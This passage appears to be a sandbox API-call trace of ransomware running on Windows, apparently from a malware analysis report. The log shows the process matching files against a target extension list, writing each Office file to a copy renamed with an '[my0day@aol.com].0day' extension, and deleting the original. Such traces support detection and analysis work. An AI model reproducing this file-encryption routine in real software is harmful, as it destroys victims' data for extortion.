[0271.984] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0271.984] lstrlenW (lpString=".pdf") returned 4 [0271.984] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.984] lstrlenW (lpString=".xls") returned 4 [0271.984] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.984] lstrlenW (lpString=".xlsx") returned 5 [0271.984] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0271.984] lstrlenW (lpString=".ppt") returned 4 [0271.984] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0271.984] lstrlenW (lpString=".zip") returned 4 [0271.984] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.984] lstrlenW (lpString=".rar") returned 4 [0271.984] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.984] lstrlenW (lpString=".bz2") returned 4 [0271.984] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.984] lstrlenW (lpString=".7z") returned 3 [0271.984] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0271.984] lstrlenW (lpString=".dbf") returned 4 [0271.984] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0271.984] lstrlenW (lpString=".1cd") returned 4 [0271.984] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.984] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0271.984] lstrlenW (lpString=".jpg") returned 4 [0271.984] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0271.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0271.985] lstrlenW (lpString=".doc") returned 4 [0271.985] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0271.985] lstrlenW (lpString=".docx") returned 5 [0271.985] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0271.985] lstrlenW (lpString=".pdf") returned 4 [0271.985] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0271.985] lstrlenW (lpString=".xls") returned 4 [0271.985] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0271.985] lstrlenW (lpString=".xlsx") returned 5 [0271.985] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0271.985] lstrlenW (lpString=".ppt") returned 4 [0271.985] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0271.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0271.985] lstrlenW (lpString=".zip") returned 4 [0271.985] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0271.985] lstrlenW (lpString=".rar") returned 4 [0271.985] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0271.985] lstrlenW (lpString=".bz2") returned 4 [0271.985] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0271.985] lstrlenW (lpString=".7z") returned 3 [0271.985] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0271.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0271.985] lstrlenW (lpString=".dbf") returned 4 [0271.985] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0271.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0271.985] lstrlenW (lpString=".1cd") returned 4 [0271.985] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0271.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned 63 [0271.985] lstrlenW (lpString=".jpg") returned 4 [0271.985] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0271.986] lstrcmpiW (lpString1=".MID", lpString2=".0day") returned 1 [0271.986] lstrlenW (lpString="VCTRN_01.MID") returned 12 [0271.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0272.010] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=4961) returned 1 [0272.010] CloseHandle (hObject=0x388) returned 1 [0272.010] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid")) returned 0x20 [0272.027] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.041] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.041] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0272.041] GetLastError () returned 0x0 [0272.041] ReadFile (in: hFile=0x394, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x1361, lpOverlapped=0x0) returned 1 [0272.055] WriteFile (in: hFile=0x318, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x1370, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x1370, lpOverlapped=0x0) returned 1 [0272.056] ReadFile (in: hFile=0x394, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.056] WriteFile (in: hFile=0x318, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xec, lpOverlapped=0x0) returned 1 [0272.057] SetEndOfFile (hFile=0x318) returned 1 [0272.057] CloseHandle (hObject=0x318) returned 1 [0272.057] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.057] SetEndOfFile (hFile=0x394) returned 1 [0272.059] CloseHandle (hObject=0x394) returned 1 [0272.059] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.082] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\vctrn_01.mid")) returned 1 [0272.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0272.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0272.109] lstrlenW (lpString=".doc") returned 4 [0272.109] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0272.109] lstrlenW (lpString=".docx") returned 5 [0272.109] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0272.109] lstrlenW (lpString=".pdf") returned 4 [0272.109] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0272.109] lstrlenW (lpString=".xls") returned 4 [0272.109] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0272.109] lstrlenW (lpString=".xlsx") returned 5 [0272.109] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0272.109] lstrlenW (lpString=".ppt") returned 4 [0272.109] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0272.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0272.109] lstrlenW (lpString=".zip") returned 4 [0272.109] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0272.109] lstrlenW (lpString=".rar") returned 4 [0272.109] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0272.109] lstrlenW (lpString=".bz2") returned 4 [0272.109] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0272.109] lstrlenW (lpString=".7z") returned 3 [0272.110] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0272.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0272.110] lstrlenW (lpString=".dbf") returned 4 [0272.110] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0272.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0272.110] lstrlenW (lpString=".1cd") returned 4 [0272.110] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0272.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0272.110] lstrlenW (lpString=".jpg") returned 4 [0272.110] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0272.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0272.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0272.110] lstrlenW (lpString=".doc") returned 4 [0272.110] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0272.110] lstrlenW (lpString=".docx") returned 5 [0272.110] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0272.110] lstrlenW (lpString=".pdf") returned 4 [0272.110] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0272.110] lstrlenW (lpString=".xls") returned 4 [0272.110] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0272.110] lstrlenW (lpString=".xlsx") returned 5 [0272.110] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0272.110] lstrlenW (lpString=".ppt") returned 4 [0272.110] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0272.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0272.110] lstrlenW (lpString=".zip") returned 4 [0272.110] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0272.110] lstrlenW (lpString=".rar") returned 4 [0272.110] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0272.111] lstrlenW (lpString=".bz2") returned 4 [0272.111] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0272.111] lstrlenW (lpString=".7z") returned 3 [0272.111] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0272.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0272.111] lstrlenW (lpString=".dbf") returned 4 [0272.111] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0272.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0272.111] lstrlenW (lpString=".1cd") returned 4 [0272.111] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0272.111] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\VCTRN_01.MID") returned 63 [0272.111] lstrlenW (lpString=".jpg") returned 4 [0272.111] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0272.111] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.111] lstrlenW (lpString="Apothecary.eftx") returned 15 [0272.111] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0272.138] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=49025) returned 1 [0272.138] CloseHandle (hObject=0x318) returned 1 [0272.138] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx")) returned 0x20 [0272.138] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0272.194] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.194] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.194] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0272.204] GetLastError () returned 0x0 [0272.204] ReadFile (in: hFile=0x394, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0xbf81, lpOverlapped=0x0) returned 1 [0272.297] WriteFile (in: hFile=0x380, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xbf90, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xbf90, lpOverlapped=0x0) returned 1 [0272.300] ReadFile (in: hFile=0x394, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.300] WriteFile (in: hFile=0x380, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0272.300] SetEndOfFile (hFile=0x380) returned 1 [0272.300] CloseHandle (hObject=0x380) returned 1 [0272.300] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.300] SetEndOfFile (hFile=0x394) returned 1 [0272.304] CloseHandle (hObject=0x394) returned 1 [0272.304] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.400] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\apothecary.eftx")) returned 1 [0272.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0272.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0272.418] lstrlenW (lpString=".doc") returned 4 [0272.418] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.418] lstrlenW (lpString=".docx") returned 5 [0272.418] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.418] lstrlenW (lpString=".pdf") returned 4 [0272.418] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.418] lstrlenW (lpString=".xls") returned 4 [0272.418] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.418] lstrlenW (lpString=".xlsx") returned 5 [0272.418] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.418] lstrlenW (lpString=".ppt") returned 4 [0272.418] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0272.418] lstrlenW (lpString=".zip") returned 4 [0272.418] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.418] lstrlenW (lpString=".rar") returned 4 [0272.418] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.418] lstrlenW (lpString=".bz2") returned 4 [0272.418] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.418] lstrlenW (lpString=".7z") returned 3 [0272.418] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0272.419] lstrlenW (lpString=".dbf") returned 4 [0272.419] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0272.419] lstrlenW (lpString=".1cd") returned 4 [0272.419] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0272.419] lstrlenW (lpString=".jpg") returned 4 [0272.419] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0272.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0272.419] lstrlenW (lpString=".doc") returned 4 [0272.419] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.419] lstrlenW (lpString=".docx") returned 5 [0272.419] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.419] lstrlenW (lpString=".pdf") returned 4 [0272.419] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.419] lstrlenW (lpString=".xls") returned 4 [0272.419] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.419] lstrlenW (lpString=".xlsx") returned 5 [0272.419] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.419] lstrlenW (lpString=".ppt") returned 4 [0272.419] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0272.419] lstrlenW (lpString=".zip") returned 4 [0272.419] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.419] lstrlenW (lpString=".rar") returned 4 [0272.419] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.419] lstrlenW (lpString=".bz2") returned 4 [0272.419] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0272.419] lstrlenW (lpString=".7z") returned 3 [0272.419] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0272.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0272.419] lstrlenW (lpString=".dbf") returned 4 [0272.420] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0272.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0272.420] lstrlenW (lpString=".1cd") returned 4 [0272.420] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0272.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Apothecary.eftx") returned 82 [0272.420] lstrlenW (lpString=".jpg") returned 4 [0272.420] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0272.420] lstrcmpiW (lpString1=".eftx", lpString2=".0day") returned 1 [0272.420] lstrlenW (lpString="Austin.eftx") returned 11 [0272.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0272.424] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x344ff1c | out: lpFileSize=0x344ff1c*=26989) returned 1 [0272.424] CloseHandle (hObject=0x3a8) returned 1 [0272.424] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx")) returned 0x20 [0272.424] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0272.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0272.425] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.425] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0272.425] GetLastError () returned 0x0 [0272.425] ReadFile (in: hFile=0x3a8, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x696d, lpOverlapped=0x0) returned 1 [0272.429] WriteFile (in: hFile=0x390, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x6970, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0x6970, lpOverlapped=0x0) returned 1 [0272.430] ReadFile (in: hFile=0x3a8, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x344fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x344fed4*=0x0, lpOverlapped=0x0) returned 1 [0272.430] WriteFile (in: hFile=0x390, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x344fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x344fc9c*=0xea, lpOverlapped=0x0) returned 1 [0272.430] SetEndOfFile (hFile=0x390) returned 1 [0272.430] CloseHandle (hObject=0x390) returned 1 [0272.430] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x344fec8 | out: lpNewFilePointer=0x0) returned 1 [0272.430] SetEndOfFile (hFile=0x3a8) returned 1 [0272.515] CloseHandle (hObject=0x3a8) returned 1 [0272.515] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0272.588] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx")) returned 1 [0272.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0272.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0272.589] lstrlenW (lpString=".doc") returned 4 [0272.589] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0272.589] lstrlenW (lpString=".docx") returned 5 [0272.589] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0272.589] lstrlenW (lpString=".pdf") returned 4 [0272.589] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0272.589] lstrlenW (lpString=".xls") returned 4 [0272.589] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0272.589] lstrlenW (lpString=".xlsx") returned 5 [0272.589] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0272.589] lstrlenW (lpString=".ppt") returned 4 [0272.589] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0272.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx") returned 78 [0272.589] lstrlenW (lpString=".zip") returned 4 [0272.589] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0272.589] lstrlenW (lpString=".rar") returned 4 [0272.589] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0272.589] lstrlenW (lpString=".bz2") returned 4 